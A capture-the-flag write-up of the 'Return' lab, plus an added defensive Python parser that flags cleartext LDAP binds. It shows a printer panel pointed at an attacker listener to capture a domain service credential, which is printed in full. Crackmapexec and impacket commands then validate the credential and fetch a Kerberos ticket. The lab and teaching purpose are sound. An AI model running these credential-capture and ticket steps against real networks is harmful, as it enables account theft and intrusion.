Web


Nmap discovered a web server on the target's port 80. The running service is Microsoft IIS httpd 10.0.

Webroot

The web root appears to serve as an administrative GUI panel for one or more printers.

Wappalyzer identified the technologies involved. I can see that it is written in PHP 7.4.13.

Those two buttons in the header, Fax and Troubleshooting, don't seem to work.

However, the Settings button leads to the settings.php file. There is already pre-configured information sitting in the form: the username is svc-printer, and the password is either obfuscated and 7 characters long, or just a placeholder.

I modified the form for testing.

Interestingly, the form only sends a POST request to the file with the ip parameter, although there appear to be 3 other parameters present in the form. That still means that I am able to configure the ip parameter.

I first started a Netcat listener on port 389 (the LDAP port) on Kali.

I set the ip parameter to kali and sent the POST request.

I got an inbound connection to the Netcat listener on Kali, and it carried what appears to be a CLEARTEXT credential.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ sudo responder -I tun0 -v
__
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 
  to support this project:
  patreon -> https://www.patreon.com/PythonResponder
  paypal  -> https://paypal.me/PythonResponder
 
  author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
 
 
[+] poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
 
[+] servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
 
[+] http options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
 
[+] poisoning options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
 
[+] generic options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.5]
    responder ipv6             [dead:beef:2::1003]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP']
 
[+] current session variables:
    Responder Machine Name     [WIN-CJXUQZJ30UW]
    Responder Domain Name      [D6VF.LOCAL]
    Responder DCE-RPC Port     [48671]
 
[+] Listening for events...
 
[LDAP] Attempting to parse an old simple Bind request.
[ldap] cleartext client   : 10.10.11.108
[ldap] cleartext username : return\svc-printer
[ldap] cleartext password : 1edFg43012!!

I can confirm that with Responder as well.
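As an added example (not from the original post, and not Responder's code), the following Python parser shows what the listener received: an LDAPv3 simple BindRequest, whose DN and password are plain BER OCTET STRINGs. The sample message and its placeholder password are constructed here, and the function reports the password's length rather than its value.

```python
# Added example (not from the original post): detect a cleartext LDAP simple
# bind (RFC 4511) in captured bytes. A simple bind carries the DN and password
# as plain OCTET STRINGs, which is why the panel's LDAP callback leaked a
# usable credential. The sample message and its password are constructed.

def ber(tag: int, payload: bytes) -> bytes:
    """Encode one BER TLV (short or long definite-length form)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + payload

def read_tlv(buf: bytes, pos: int):
    """Decode the TLV at pos; return (tag, value, position after it)."""
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first & 0x80:                      # long form: next N bytes hold length
        size = first & 0x7F
        length = int.from_bytes(buf[pos:pos + size], "big")
        pos += size
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length

def parse_simple_bind(msg: bytes):
    """Return {msgid, version, name, password_len} for a simple BindRequest,
    else None. The password is counted, never returned, by design."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:                       # LDAPMessage ::= SEQUENCE
        return None
    _, msgid, pos = read_tlv(body, 0)     # messageID INTEGER
    op_tag, op, _ = read_tlv(body, pos)
    if op_tag != 0x60:                    # [APPLICATION 0] BindRequest
        return None
    _, version, pos = read_tlv(op, 0)     # version INTEGER
    _, name, pos = read_tlv(op, pos)      # name LDAPDN (OCTET STRING)
    auth_tag, cred, _ = read_tlv(op, pos)
    if auth_tag != 0x80:                  # simple [0]; 0xA3 would be SASL
        return None
    return {"msgid": int.from_bytes(msgid, "big"),
            "version": int.from_bytes(version, "big"),
            "name": name.decode(), "password_len": len(cred)}

# Constructed sample of what the panel sends to the host named in 'ip'.
SAMPLE_BIND = ber(0x30, ber(0x02, b"\x01")                     # messageID 1
                  + ber(0x60, ber(0x02, b"\x03")               # version 3
                             + ber(0x04, b"return\\svc-printer")
                             + ber(0x80, b"placeholder-pw")))  # simple auth
```

On a network sensor this is the check that flags the panel's callback: port 389, a simple bind, and a non-empty password. On the panel side the fix is to bind over LDAPS or StartTLS to a fixed, validated server rather than to whatever host is typed into the form.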

Although it appears to be a domain credential, it is always good practice to validate it.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ cme smb $IP -d RETURN.LOCAL --kdcHost printer.return.local -u svc-printer -p '1edFg43012!!'                     
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:RETURN.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] RETURN.LOCAL\svc-printer:1edFg43012!! 

The credential has been validated against the SMB server through crackmapexec.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-getTGT 'return.local/svc-printer:1edFg43012!!' -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in svc-printer.ccache

I also saved a TGT for the svc-printer user for better OPSEC, so that I can opt to continue the operation through the pass-the-ticket technique.

Now that I have a valid domain credential, I can move on to in-depth enumeration.